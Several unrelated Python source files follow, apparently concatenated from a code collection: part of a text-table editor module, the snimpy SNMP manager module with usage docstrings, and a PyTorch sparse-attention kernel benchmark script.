diff_count = column_count - len(row) - overcols
for i in range(diff_count):
row.columns.append(row.new_empty_column())
if len(row) == 0:
row.columns.append(row.new_empty_column())
#prepare rowspans for next row
for col_ind, rowspan in enumerate(rowspans):
if rowspan > 0:
rowspans[col_ind] = rowspans[col_ind] - 1
for col_ind, column in enumerate(row.columns):
rowspans[col_ind] = rowspans[col_ind] + column.rowspan - 1
#calculate column lens
col_lens = [0] * column_count
for row in self.rows:
for col_ind, column in enumerate(row.columns):
col_lens[col_ind] = max(col_lens[col_ind], column.min_len())
#set column len
for row in self.rows:
for column, col_len in zip(row.columns, col_lens):
column.col_len = col_len
#header
header_separator_index = -1
first_data_index = -1
if self.syntax.detect_header:
for row_ind, row in enumerate(self.rows):
if first_data_index == -1 and row.is_data():
first_data_index = row_ind
if (first_data_index != -1 and header_separator_index == -1
and row.is_header_separator()):
header_separator_index = row_ind
for header_index in range(first_data_index, header_separator_index):
if self.rows[header_index].is_data():
for column in self.rows[header_index].columns:
column.header = True
#set column alignment
data_alignment = [None] * len(col_lens)
for row_ind, row in enumerate(self.rows):
if row_ind < header_separator_index:
if row.is_align():
for col_ind, column in enumerate(row.columns):
data_alignment[col_ind] = column.align_follow()
continue
elif row.is_align():
for col_ind, column in enumerate(row.columns):
data_alignment[col_ind] = column.align_follow()
elif row.is_data():
for col_ind, column in enumerate(row.columns):
if data_alignment[col_ind] is None:
if self.syntax.align_number_right and self._is_number_column(row_ind, col_ind):
data_alignment[col_ind] = Column.ALIGN_RIGHT
else:
data_alignment[col_ind] = Column.ALIGN_LEFT
column.align = data_alignment[col_ind]
def _is_number_column(self, start_row_ind, col_ind):
assert self.rows[start_row_ind].is_data()
for row in self.rows[start_row_ind:]:
if (row.is_data()
and col_ind < len(row.columns)
and len(row.columns[col_ind].data.strip()) > 0):
try:
float(row.columns[col_ind].data)
except ValueError:
return False
return True
def render_lines(self):
return [self.prefix + row.render() for row in self.rows]
def render(self):
return "\n".join(self.render_lines())
def is_col_colspan(self, col):
for row in self.rows:
if col < len(row):
if row[col].pseudo() or row[col].colspan > 1:
return True
return False
def is_row_colspan(self, row):
for column in self[row].columns:
if column.pseudo() or column.colspan > 1:
return True
return False
def assert_not_col_colspan(self, col):
check_condition(self.is_col_colspan(col) is False,
"Expected not colspan column, but column {0}"
" is colspan".format(col))
def delete_column(self, col):
self.assert_not_col_colspan(col)
for row in self.rows:
if col < len(row):
del row.columns[col]
self.pack()
def swap_columns(self, i, j):
self.assert_not_col_colspan(i)
self.assert_not_col_colspan(j)
for row in self.rows:
if i < len(row) and j < len(row):
row.columns[i], row.columns[j] = row.columns[j], row.columns[i]
self.pack()
def delete_row(self, i):
assert 0 <= i < len(self.rows)
del self.rows[i]
self.pack()
def swap_rows(self, i, j):
check_condition((0 <= i < len(self.rows) and
0 <= j < len(self.rows)),
"Index out of range")
self.rows[i], self.rows[j] = self.rows[j], self.rows[i]
for column in self.rows[i].columns:
column.header = False
for column in self.rows[j].columns:
column.header = False
self.pack()
def insert_empty_row(self, i):
check_condition(i >= 0, "Index should be more than zero")
self.rows.insert(i, DataRow(self))
self.pack()
def insert_empty_column(self, i):
check_condition(i >= 0, "Index should be more than zero")
self.assert_not_col_colspan(i)
for row in self.rows:
row.columns.insert(i, row.new_empty_column())
self.pack()
class TableException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class TablePos:
def __init__(self, row_num, field_num):
self.row_num = row_num
self.field_num = field_num
def __repr__(self):
return "TablePos({self.row_num}, {self.field_num})".format(self=self)
def __str__(self):
return self.__repr__()
def __eq__(self, other):
return (self.row_num == other.row_num
and self.field_num == other.field_num)
class TableDriver:
def __init__(self, syntax):
self.syntax = syntax
def visual_column_count(self, table, row_ind):
return sum([1 for column in table[row_ind].columns
if not column.pseudo()])
def internal_to_visual_index(self, table, internal_pos):
visual_pos = TablePos(internal_pos.row_num, internal_pos.field_num)
for col_ind in range(internal_pos.field_num + 1):
if table[internal_pos.row_num][col_ind].pseudo():
visual_pos.field_num -= 1
return visual_pos
def visual_to_internal_index(self, table, visual_pos):
internal_pos = TablePos(visual_pos.row_num, 0)
count_visual = 0
internal_pos.field_num = 0
for col_ind in range(len(table[visual_pos.row_num])):
if not table[visual_pos.row_num][col_ind].pseudo():
count_visual += 1
internal_pos.field_num = col_ind
if count_visual == visual_pos.field_num + 1:
break
else:
print("WARNING: Visual Index Not found")
return internal_pos
def get_cursor(self, table, visual_pos):
#
# ' | 1 | 2 | 3_| 4 |'
internal_pos = self.visual_to_internal_index(table, visual_pos)
base_len = (len(table.prefix)
+ sum([column.col_len - wcount(column.render()) for column, ind
in zip(table[visual_pos.row_num].columns,
range(internal_pos.field_num))])
+ internal_pos.field_num + 1 # count of '|'
)
text = table[internal_pos.row_num][internal_pos.field_num].render()
match = re.search(r"([^\s])\s*$", text)
if match:
col_pos = match.end(1)
else:
col_pos = 1
return base_len + col_pos
def editor_move_column_left(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if field_num > 0:
if (table.is_col_colspan(field_num) or
table.is_col_colspan(field_num - 1)):
raise TableException("Move Column Left is not "
"permitted for colspan column")
else:
table.swap_columns(field_num, field_num - 1)
return ("Column moved to left",
TablePos(table_pos.row_num, table_pos.field_num - 1))
else:
raise TableException("Move Column Left doesn't "
"make sence for the first column in the "
"table.")
def editor_move_column_right(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if field_num < len(table[table_pos.row_num]) - 1:
if (table.is_col_colspan(field_num) or
table.is_col_colspan(field_num + 1)):
raise TableException("Move Column Right is not "
"permitted for colspan column")
else:
table.swap_columns(field_num, field_num + 1)
return ("Column moved to right",
TablePos(table_pos.row_num, table_pos.field_num + 1))
else:
raise TableException("Move Column Right doesn't "
"make sense for the last column in the "
"table.")
def editor_move_row_up(self, table, table_pos):
if table_pos.row_num > 0:
table.swap_rows(table_pos.row_num, table_pos.row_num - 1)
return("Row moved up",
TablePos(table_pos.row_num - 1, table_pos.field_num))
else:
raise TableException("Move Row Up doesn't make sense for the "
"first row in the table")
def editor_move_row_down(self, table, table_pos):
if table_pos.row_num + 1 < len(table):
table.swap_rows(table_pos.row_num, table_pos.row_num + 1)
return ("Row moved down",
TablePos(table_pos.row_num + 1, table_pos.field_num))
else:
raise TableException("Move Row Down doesn't make sense for the "
"last row in the table")
def editor_next_row(self, table, table_pos):
if table_pos.row_num + 1 < len(table):
if table[table_pos.row_num + 1].is_header_separator():
table.insert_empty_row(table_pos.row_num + 1)
else:
table.insert_empty_row(len(table))
return ("Moved to next row",
TablePos(table_pos.row_num + 1, table_pos.field_num))
def editor_delete_column(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if table.is_col_colspan(field_num):
raise TableException("Delete column is not permitted for "
"colspan column")
else:
table.delete_column(field_num)
new_table_pos = TablePos(table_pos.row_num,
table_pos.field_num)
if (not table.empty() and
table_pos.field_num == len(table[table_pos.row_num])):
new_table_pos.field_num = new_table_pos.field_num - 1
return("Column deleted", new_table_pos)
def editor_insert_column(self, table, table_pos):
internal_pos = self.visual_to_internal_index(table, table_pos)
field_num = internal_pos.field_num
if table.is_col_colspan(field_num):
raise TableException("Insert column is not permitted for "
"colspan column")
else:
table.insert_empty_column(field_num)
return ("Column inserted",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_kill_row(self, table, table_pos):
table.delete_row(table_pos.row_num)
new_table_pos = TablePos(table_pos.row_num, table_pos.field_num)
if table_pos.row_num == len(table):
new_table_pos.row_num = new_table_pos.row_num - 1
return ("Row deleted", new_table_pos)
def editor_insert_row(self, table, table_pos):
table.insert_empty_row(table_pos.row_num)
return ("Row inserted",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_insert_single_hline(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert single line"
.format(self.syntax.name))
def editor_insert_double_hline(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert double line"
.format(self.syntax.name))
def editor_insert_hline_and_move(self, table, table_pos):
raise TableException("Syntax {0} doesn't support insert single line "
"and move".format(self.syntax.name))
def editor_align(self, table, table_pos):
return ("Table aligned",
TablePos(table_pos.row_num, table_pos.field_num))
def editor_join_lines(self, table, table_pos):
if (table_pos.row_num + 1 < len(table)
and table[table_pos.row_num].is_data()
and table[table_pos.row_num + 1].is_data()
and not table.is_row_colspan(table_pos.row_num)
and not table.is_row_colspan(table_pos.row_num + 1)):
for curr_col, next_col in zip(table[table_pos.row_num].columns,
table[table_pos.row_num + 1].columns):
curr_col.data = curr_col.data.strip() + " " + next_col.data.strip()
table.delete_row(table_pos.row_num + 1)
return ("Rows joined",
TablePos(table_pos.row_num, table_pos.field_num))
else:
raise TableException("Join columns is not permitted")
def editor_next_field(self, table, table_pos):
pos = TablePos(table_pos.row_num, table_pos.field_num)
moved = False
while True:
if table[pos.row_num].is_separator():
if pos.row_num + 1 < len(table):
pos.field_num = 0
pos.row_num += 1
moved = True
continue
else:
#sel_row == last_table_row
table.insert_empty_row(len(table))
pos.field_num = 0
pos.row_num += 1
break
elif moved:
break
elif pos.field_num + 1 < self.visual_column_count(table, pos.row_num):
pos.field_num += 1
break
elif pos.row_num + 1 < len(table):
pos.field_num = 0
pos.row_num += 1
moved = True
continue
else:
#sel_row == last_table_row
table.insert_empty_row(len(table))
pos.field_num = 0
pos.row_num += 1
break
return ("Cursor position changed", pos)
def editor_previous_field(self, table, table_pos):
pos = TablePos(table_pos.row_num, table_pos.field_num)
moved = False
while True:
if table[pos.row_num].is_separator():
if pos.row_num > 0:
pos.row_num -= 1
pos.field_num = self.visual_column_count(table, pos.row_num) - 1
moved = True
continue
else:
#row_num == 0
pos.field_num = 0
break
elif moved:
break
elif pos.field_num > 0:
pos.field_num -= 1
break
elif pos.row_num > 0:
pos.row_num -= 1
pos.field_num = self.visual_column_count(table, pos.row_num) - 1
moved = True
continue
else:
#row_num == 0
break
return ("Cursor position changed", pos)
def parse_csv(self, text):
try:
table = TextTable(self.syntax)
dialect = csv.Sniffer().sniff(text)
table_reader = csv.reader(text.splitlines(), dialect)
for cols in table_reader:
row = DataRow(table)
for col in cols:
row.columns.append(DataColumn(row, col))
table.rows.append(row)
except csv.Error:
table = TextTable(self.syntax)
for line in text.splitlines():
row = DataRow(table)
row.columns.append(DataColumn(row, line))
table.rows.append(row)
table.pack()
return table
class BaseTableParser:
def __init__(self, syntax):
self.syntax = syntax
def parse_row(self, table, line):
row = self.create_row(table, line)
for line_cell in line.cells:
column = self.create_column(table, row, line_cell)
row.append(column)
return row
def create_row(self, table, line):
raise NotImplementedError
def create_column(self, table, row, line_cell):
column = row.create_column(line_cell.text)
column.left_border_text = line_cell.left_border_text
column.right_border_text = line_cell.right_border_text
return column
def is_table_row(self, row):
return re.match(r"^\s*[|+]",row) is not None
def parse_text(self, text):
table = TextTable(self.syntax)
lines = text.splitlines()
for ind, line in enumerate(lines):
line = self.syntax.line_parser.parse(line)
if ind == 0:
table.prefix = line.prefix
row = self.parse_row(table, line)
table.rows.append(row)
table.pack()
return table
|
snimpy/manager.py | vincentbernat/snimpy | 129 | 12652874 | #
# snimpy -- Interactive SNMP tool
#
# Copyright (C) <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""This module is the high-level interface to *Snimpy*. It exposes
:class:`Manager` class to instantiate a new manager (which is an SNMP
client). This is the preferred interface for *Snimpy*.
Here is a simple example of use of this module::
>>> load("IF-MIB")
>>> m = Manager("localhost")
>>> m.ifDescr[1]
<String: lo>
"""
import inspect
from time import time
from collections.abc import MutableMapping, Container, Iterable, Sized
from snimpy import snmp, mib, basictypes
class DelegatedSession:
"""General class for SNMP session for delegation"""
def __init__(self, session):
self._session = session
def __getattr__(self, attr):
return getattr(self._session, attr)
def __setattribute__(self, attr, value):
return setattr(self._session, attr, value)
class DelayedSetSession(DelegatedSession):
"""SNMP session that is able to delay SET requests.
This is an adapter. The constructor takes the original (not
delayed) session.
"""
def __init__(self, session):
DelegatedSession.__init__(self, session)
self.setters = []
def set(self, *args):
self.setters.extend(args)
def commit(self):
if self.setters:
self._session.set(*self.setters)
class NoneSession(DelegatedSession):
"""SNMP session that will return None on unsucessful GET requests.
In a normal session, a GET request returning `No such instance`
error will trigger an exception. This session will catch such an
error and return None instead.
"""
def get(self, *args):
try:
return self._session.get(*args)
except (snmp.SNMPNoSuchName,
snmp.SNMPNoSuchObject,
snmp.SNMPNoSuchInstance):
if len(args) > 1:
# We can't handle this case yet because we don't know
# which value is unavailable.
raise
return ((args[0], None),)
class CachedSession(DelegatedSession):
"""SNMP session using a cache.
This is an adapter. The constructor takes the original session.
"""
def __init__(self, session, timeout=5):
DelegatedSession.__init__(self, session)
self.cache = {} # contains (operation, oid) -> [time, result] entries
self.timeout = timeout
self.count = 0
def getorwalk(self, op, *args):
self.count += 1
if (op, args) in self.cache:
t, v = self.cache[op, args]
if time() - t < self.timeout:
return v
value = getattr(self._session, op)(*args)
self.cache[op, args] = [time(), value]
if op == "walkmore":
# also cache all the get requests we got for free
for oid, get_value in value:
self.count += 1
self.cache["get", (oid, )] = [time(), ((oid, get_value), )]
self.flush()
return value
def get(self, *args):
return self.getorwalk("get", *args)
def walk(self, *args):
assert(len(args) == 1) # we should ony walk one oid at a time
return self.getorwalk("walkmore", *args)
def flush(self):
keys = list(self.cache.keys())
for k in keys:
if time() - self.cache[k][0] > self.timeout:
del self.cache[k]
self.count = 0
def MibRestrictedManager(original, mibs):
"""Copy an existing manager but restrict its view to the given set of
MIBs.
"""
clone = Manager(**original._constructor_args)
clone._loaded = mibs
return clone
class Manager:
"""SNMP manager. An instance of this class will represent an SNMP
manager (client).
When a MIB is loaded with :func:`load`, scalars and row names from
it will be made available as an instance attribute. For a scalar,
reading the corresponding attribute will get its value while
setting it will allow to modify it:
>>> load("SNMPv2-MIB")
>>> m = Manager("localhost", "private")
>>> m.sysContact
<String: root>
>>> m.sysContact = "<NAME>"
>>> m.sysContact
<String: <NAME>>
For a row name, the provided interface is like a Python
dictionary. Requesting an item using its index will retrieve the
value from the agent (the server)::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ifDescr[1]
<String: lo>
>>> m.ifName[1] = "Loopback interface"
Also, it is possible to iterate on a row name to get all available
values for index::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> for idx in m.ifDescr:
... print(m.ifDescr[idx])
You can get a slice of index values from a table by iterating on
a row name subscripted by a partial index::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> for idx in m.ipNetToMediaPhysAddress[1]:
... print(idx)
(<Integer: 1>, <IpAddress: 127.0.0.1>)
You can use multivalue indexes in two ways: using Pythonic
multi-dimensional dict syntax, or by providing a tuple containing
index values::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ipNetToMediaPhysAddress[1]['127.0.0.1']
<String: aa:bb:cc:dd:ee:ff>
>>> m.ipNetToMediaPhysAddress[1, '127.0.0.1']
<String: aa:bb:cc:dd:ee:ff>
A context manager is also provided. Any modification issued inside
the context will be delayed until the end of the context and then
grouped into a single SNMP PDU to be executed atomically::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> with m:
... m.ifName[1] = "Loopback interface"
... m.ifName[2] = "First interface"
Any error will be turned into an exception::
>>> load("IF-MIB")
>>> m = Manager("localhost", "private")
>>> m.ifDescr[999]
Traceback (most recent call last):
...
SNMPNoSuchName: There is no such variable name in this MIB.
"""
# do we want this object to be populated with all nodes?
_complete = False
def __init__(self,
host="localhost",
community="public", version=2,
cache=False, none=False,
timeout=None, retries=None,
loose=False, bulk=40,
# SNMPv3
secname=None,
authprotocol=None, authpassword=<PASSWORD>,
privprotocol=None, privpassword=<PASSWORD>,
contextname=None):
"""Create a new SNMP manager. Some of the parameters are explained in
:meth:`snmp.Session.__init__`.
:param host: The hostname or IP address of the agent to
connect to. Optionally, the port can be specified
separated with a double colon.
:type host: str
:param community: The community to transmit to the agent for
authorization purpose. This parameter is ignored if the
specified version is 3.
:type community: str
:param version: The SNMP version to use to talk with the
agent. Possible values are `1`, `2` (community-based) or
`3`.
:type version: int
:param cache: Should caching be enabled? This can be either a
boolean or an integer to specify the cache timeout in
seconds. If `True`, the default timeout is 5 seconds.
:type cache: bool or int
:param none: Should `None` be returned when the agent does not
know the requested OID? If `True`, `None` will be returned
when requesting an inexisting scalar or column.
:type none: bool
:param timeout: Use the specified value in seconds as timeout.
:type timeout: int
:param retries: How many times the request should be retried?
:type retries: int
:param loose: Enable loose typing. When type coercion fails
(for example when a MIB declare an element to be an ASCII
string while it is not), just return the raw result
instead of an exception. This mode should be enabled with
caution. Patching the MIB is a better idea.
:type loose: bool
:param bulk: Max-repetition to use to speed up MIB walking
with `GETBULK`. Set to `0` to disable.
:type bulk: int
"""
if host is None:
host = Manager._host
self._host = host
self._session = snmp.Session(host, community, version,
secname,
authprotocol, authpassword,
privprotocol, privpassword,
contextname=contextname,
bulk=bulk)
if timeout is not None:
self._session.timeout = int(timeout * 1000000)
if retries is not None:
self._session.retries = retries
if cache:
if cache is True:
self._session = CachedSession(self._session)
else:
self._session = CachedSession(self._session, cache)
if none:
self._session = NoneSession(self._session)
self._loose = loose
self._loaded = loaded
# To be able to clone, we save the arguments provided to the
# constructor in a generic way
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
self._constructor_args = {a: values[a]
for a in args
if a != 'self'}
def _locate(self, attribute):
for m in self._loaded:
try:
a = mib.get(m, attribute)
return (m, a)
except mib.SMIException:
pass
raise AttributeError("{} not found in any MIBs".format(attribute))
def __getattribute__(self, attribute):
if attribute.startswith("_"):
return object.__getattribute__(self, attribute)
m, a = self._locate(attribute)
if isinstance(a, mib.Scalar):
oid, result = self._session.get(a.oid + (0,))[0]
if result is not None:
try:
return a.type(a, result)
except ValueError:
if self._loose:
return result
raise
return None
elif isinstance(a, mib.Column):
return ProxyColumn(self._session, a, self._loose)
elif isinstance(a, mib.Table):
return ProxyTable(self._session, a, self._loose)
raise NotImplementedError
def __setattr__(self, attribute, value):
if attribute.startswith("_"):
return object.__setattr__(self, attribute, value)
m, a = self._locate(attribute)
if not isinstance(value, basictypes.Type):
value = a.type(a, value, raw=False)
if isinstance(a, mib.Scalar):
self._session.set(a.oid + (0,), value)
return
raise AttributeError("{} is not writable".format(attribute))
def __getitem__(self, modulename):
modulename = modulename.encode('ascii')
for m in loaded:
if modulename == m:
return MibRestrictedManager(self, [m])
raise KeyError("{} is not a loaded module".format(modulename))
def __repr__(self):
return "<Manager for {}>".format(self._host)
def __enter__(self):
"""In a context, we group all "set" into a single request"""
self._osession = self._session
self._session = DelayedSetSession(self._session)
return self
def __exit__(self, type, value, traceback):
"""When we exit, we should execute all "set" requests"""
try:
if type is None:
self._session.commit()
finally:
self._session = self._osession
del self._osession
class Proxy:
"""A proxy for some base type, notably a column or a table."""
def __repr__(self):
return "<{} for {}>".format(self.__class__.__name__,
repr(self.proxy)[1:-1])
class ProxyIter(Proxy, Sized, Iterable, Container):
"""Proxy for an iterable sequence.
This a proxy offering the ABC of an iterable sequence (something
like a set but without set operations). This will be used by both
`ProxyColumn` and `ProxyTable`.
"""
def _op(self, op, index, *args):
if not isinstance(index, tuple):
index = (index,)
indextype = self.proxy.table.index
if len(indextype) != len(index):
raise ValueError(
"{} column uses the following "
"indexes: {!r}".format(self.proxy, indextype))
oidindex = []
for i, ind in enumerate(index):
# Cast to the correct type since we need "toOid()"
ind = indextype[i].type(indextype[i], ind, raw=False)
implied = self.proxy.table.implied and i == len(index)-1
oidindex.extend(ind.toOid(implied))
result = getattr(
self.session,
op)(self.proxy.oid + tuple(oidindex),
*args)
if op != "set":
oid, result = result[0]
if result is not None:
try:
return self.proxy.type(self.proxy, result)
except ValueError:
if self._loose:
return result
raise
return None
def __contains__(self, object):
try:
self._op("get", object)
except Exception:
return False
return True
def __iter__(self):
for k, _ in self.iteritems():
yield k
def __len__(self):
len(list(self.iteritems()))
def items(self, *args, **kwargs):
return self.iteritems(*args, **kwargs)
def iteritems(self, table_filter=None):
count = 0
oid = self.proxy.oid
indexes = self.proxy.table.index
if table_filter is not None:
if len(table_filter) >= len(indexes):
raise ValueError("Table filter has too many elements")
oid_suffix = []
# Convert filter elements to correct types
for i, part in enumerate(table_filter):
part = indexes[i].type(indexes[i], part, raw=False)
# implied = False:
# index never includes last element
# (see 'len(table_filter) >= len(indexes)')
oid_suffix.extend(part.toOid(implied=False))
oid += tuple(oid_suffix)
walk_oid = oid
for noid, result in self.session.walk(oid):
if noid <= oid:
noid = None
break
oid = noid
if not(len(oid) >= len(walk_oid) and
oid[:len(walk_oid)] ==
walk_oid[:len(walk_oid)]):
noid = None
break
# oid should be turned into index
index = tuple(oid[len(self.proxy.oid):])
target = []
for i, x in enumerate(indexes):
implied = self.proxy.table.implied and i == len(indexes)-1
l, o = x.type.fromOid(x, index, implied)
target.append(x.type(x, o))
index = index[l:]
count = count + 1
if result is not None:
try:
result = self.proxy.type(self.proxy, result)
except ValueError:
if not self._loose:
raise
if len(target) == 1:
# Should work most of the time
yield target[0], result
else:
yield tuple(target), result
if count == 0:
# We did not find any element. Is it because the column is
# empty or because the column does not exist. We do a SNMP
# GET to know. If we get a "No such instance" exception,
# this means the column is empty. If we get "No such
# object", this means the column does not exist. We cannot
# make such a distinction with SNMPv1.
try:
self.session.get(self.proxy.oid)
except snmp.SNMPNoSuchInstance:
# OK, the set of result is really empty
return
except snmp.SNMPNoAccess:
# Some implementations seem to return NoAccess (PySNMP is one)
return
except snmp.SNMPNoSuchName:
# SNMPv1, we don't know
pass
except snmp.SNMPNoSuchObject:
# The result is empty because the column is unknown
raise
class ProxyTable(ProxyIter):
"""Proxy for table access.
We just use the first accessible index as a column. However, the mapping
operations are not available.
"""
def __init__(self, session, table, loose):
self.proxy = None
for column in table.columns:
if column.accessible:
self.proxy = column
break
if self.proxy is None:
raise NotImplementedError("No accessible column in the table.")
self.session = session
self._loose = loose
class ProxyColumn(ProxyIter, MutableMapping):
"""Proxy for column access"""
def __init__(self, session, column, loose, oid_suffix=()):
self.proxy = column
self.session = session
self._loose = loose
self._oid_suffix = oid_suffix
def __getitem__(self, index):
# If supplied index is partial we return new ProxyColumn
# with appended OID suffix
idx_len = len(self.proxy.table.index)
suffix_len = len(self._oid_suffix)
if isinstance(index, tuple):
if len(index) + suffix_len < idx_len:
return self._partial(index)
elif idx_len > suffix_len + 1:
return self._partial((index,))
# Otherwise a read op is made
if not isinstance(index, tuple):
index = (index,)
return self._op("get", self._oid_suffix + index)
def __setitem__(self, index, value):
if not isinstance(value, basictypes.Type):
value = self.proxy.type(self.proxy, value, raw=False)
if not isinstance(index, tuple):
index = (index,)
self._op("set", self._oid_suffix + index, value)
def __delitem__(self, index):
raise NotImplementedError("cannot suppress a column")
def __contains__(self, index):
if not isinstance(index, tuple):
index = (index,)
return ProxyIter.__contains__(self, self._oid_suffix + index)
def _partial(self, index):
"""Create new ProxyColumn based on current one,
but with appended OID suffix"""
new_suffix = self._oid_suffix + index
return ProxyColumn(self.session, self.proxy, self._loose, new_suffix)
def items(self, *args, **kwargs):
return self.iteritems(*args, **kwargs)
def iteritems(self, table_filter=None):
resulting_filter = self._oid_suffix
if table_filter is not None:
if not isinstance(table_filter, tuple):
table_filter = (table_filter,)
resulting_filter += table_filter
return ProxyIter.iteritems(self, resulting_filter)
loaded = []
def load(mibname):
"""Load a MIB in memory.
:param mibname: MIB name or filename
:type mibname: str
"""
m = mib.load(mibname)
if m not in loaded:
loaded.append(m)
if Manager._complete:
for o in mib.getScalars(m) + \
mib.getColumns(m) + \
mib.getTables(m):
setattr(Manager, str(o), 1)
|
graph_kernel/test.py | rcmckee/BPT | 123 | 12652880 | import torch as th
from graphop import *
from torch.autograd import Function
from part_csr import partition_csr
chunk_size = 32
class SparseSoftmax(Function):
@staticmethod
def forward(ctx, row, indptr, eid, x):
y = sparse_softmax_forward(row, indptr, eid, x)
ctx.save_for_backward(row, indptr, eid, y)
return y
@staticmethod
def backward(ctx, dy):
row, indptr, eid, y = ctx.saved_tensors
return None, None, None, sparse_softmax_backward(row, indptr, eid, y, dy)
class MaskedMMCSR(Function):
@staticmethod
def forward(ctx, row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B):
ctx.save_for_backward(row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B)
return maskedmm_csr_forward(row, indptr_r, eid_r, indices_r, A, B)
@staticmethod
def backward(ctx, grad):
row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B = ctx.saved_tensors
dA, dB = maskedmm_csr_backward(row, indptr_r, eid_r, indices_r, col, indptr_c, eid_c, indices_c, A, B, grad)
return None, None, None, None, None, None, None, None, dA, dB
class NodeMulEdge(Function):
@staticmethod
def forward(ctx, row, indptr, eid, A, B):
ctx.save_for_backward(row, indptr, eid, A, B)
return node_mul_edge_forward(row, indptr, eid, A, B)
@staticmethod
def backward(ctx, grad):
row, indptr, eid, A, B = ctx.saved_tensors
dA, dB = node_mul_edge_backward(row, indptr, eid, A, B, grad)
return None, None, None, dA, dB
class VectorSPMM(Function):
@staticmethod
def forward(ctx, row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x):
y = vector_spmm_forward(row, indptr, eid, indices, edata, x)
ctx.save_for_backward(row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x)
return y
@staticmethod
def backward(ctx, dy):
row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, x = ctx.saved_tensors
dedata, dx = vector_spmm_backward(row, indptr, eid, indices, col, ptr_t, eid_t, indices_t, edata, dy, x)
return None, None, None, None, None, None, None, None, dedata, dx
class MaskedMMSimple(Function):
@staticmethod
def forward(ctx, inc_x, inc_y, A, B):
with th.no_grad():
A_e = th.sparse.mm(inc_x.float(), A) # shape: (e, d)
B_e = th.sparse.mm(inc_y.float(), B) # shape: (e, d)
ctx.save_for_backward(A_e, B_e, inc_x, inc_y)
y = (A_e * B_e).sum(-1) # shape: (e)
assert y.requires_grad==False
return y
@staticmethod
def backward(ctx, grad): # shape: (e)
A_e, B_e, inc_x, inc_y = ctx.saved_tensors
dAe = grad.unsqueeze(-1) * B_e
dBe = grad.unsqueeze(-1) * A_e
dA = th.sparse.mm(inc_x.t().float(), dAe)
dB = th.sparse.mm(inc_y.t().float(), dBe)
return None, None, dA, dB
if __name__ == '__main__':
import os
batch_size = 512
l = 30
n = batch_size * l
e = batch_size * (l ** 2)
v = th.ones(e, dtype=th.uint8)
if not os.path.exists('i.pt'):
i = th.zeros(2, e, dtype=th.long)
eid_r = th.zeros(e, dtype=th.long)
eid_c = th.zeros(e, dtype=th.long)
indptr_r = th.zeros(n + 1, dtype=th.long)
indptr_c = th.zeros(n + 1, dtype=th.long)
indices_r = th.zeros(e, dtype=th.long)
indices_c = th.zeros(e, dtype=th.long)
cnt = 0
for b in range(batch_size):
for x in range(b * l, (b + 1) * l):
indptr_r[x] = cnt
for y in range(b * l, (b + 1) * l):
i[0, cnt] = x
i[1, cnt] = y
indices_r[cnt] = y
eid_r[cnt] = cnt
cnt += 1
indptr_r[n] = cnt
cnt = 0
for b in range(batch_size):
for y in range(b * l, (b + 1) * l):
indptr_c[y] = cnt
for x in range(b * l, (b + 1) * l):
indices_c[cnt] = x
eid_c[cnt] = b * l * l + (x % l) * l + (y % l)
cnt += 1
indptr_c[n] = cnt
th.save((i, eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c), 'i.pt')
else:
i, eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c = th.load('i.pt')
adj = th.sparse.ByteTensor(i, v, th.Size([n, n]))
adj_1 = th.sparse.FloatTensor(i, th.rand(e), th.Size([n, n])).cuda(0).coalesce()
adj_1.requires_grad_(True)
if not os.path.exists('ix.pt'):
i_x = th.zeros(2, e, dtype=th.long)
i_y = th.zeros(2, e, dtype=th.long)
cnt = 0
for b in range(batch_size):
for x in range(b * l, (b + 1) * l):
for y in range(b * l, (b + 1) * l):
i_x[0, cnt] = cnt
i_x[1, cnt] = x
i_y[0, cnt] = cnt
i_y[1, cnt] = y
cnt += 1
th.save((i_x, i_y), 'ixy.pt')
else:
i_x, i_y = th.load('ixy.pt')
inc_x = th.sparse.ByteTensor(i_x, v, th.Size([e, n]))
inc_y = th.sparse.ByteTensor(i_y, v, th.Size([e, n]))
import time
inc_x = inc_x.cuda(0)
inc_y = inc_y.cuda(0)
adj = adj.cuda(0)
eid_r, eid_c, indptr_r, indptr_c, indices_r, indices_c = eid_r.cuda(0), eid_c.cuda(0), indptr_r.cuda(0), indptr_c.cuda(0), indices_r.cuda(0), indices_c.cuda(0)
th.cuda.synchronize()
print('Single Head (batch size: 512, length: 30, dim: 1024)\n===========================================')
print('MaskedNN(src_dot_dst)\nsimple implementation(copy to edge)')
